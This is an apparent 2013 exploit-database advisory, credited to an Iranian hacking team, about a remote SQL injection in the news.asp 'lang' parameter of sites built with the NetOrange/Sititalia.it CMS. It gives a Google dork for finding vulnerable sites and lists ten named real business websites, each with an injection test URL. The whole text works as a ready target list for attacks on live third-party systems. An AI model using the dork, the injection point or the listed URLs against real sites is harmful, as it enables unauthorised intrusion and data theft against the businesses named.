Sites powered by NetOrange - Sititalia.it suffer from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
c6d899774f7bdc71045706d65cae5014cc9528ddd33b73325104aa782aa78ba3
#********************************************************************************
# Exploit Title : NetOrange - Sititalia.it Sql injection vulnerability
#
# Powered by : http://www.netorange.it & http://www.sititalia.it
#
# Exploit Author : Ashiyane Digital Security Team
#
# Tested on: Windows 7 , Linux
#
# Google Dork : intext:"Powered by NetOrange - Sititalia.it"
#
# Date: 2013/08/30
#
--------------------------------------------------------------------
# 1- Location : [Target]m/news.asp?lang=[Sql Injection]
#
#
# Proof:
#
# http://www.astucciatrici.it/news.asp?lang=1'
#
# http://www.carrozzeriasosioilario.it/news.asp?lang=1'
#
# http://www.centronova.it/news.asp?lang=1'
#
# http://www.degliurbani.it/news.asp?lang=1'
#
# http://www.spiral-conveyor-systems.com//news.asp?lang=1'
#
# http://www.italmack.it/news.asp?lang=1'
#
# http://www.starsfa.it/news.asp?lang=1'
#
# http://www.steelmecsald.com/news.asp?lang=1'
#
# www.cortiautomazioni.com/news.asp?lang=1'
#
# http://www.waterjet-outlet.com/news.asp?lang=1'
#
#
######################
discovered by : ACC3SS
######################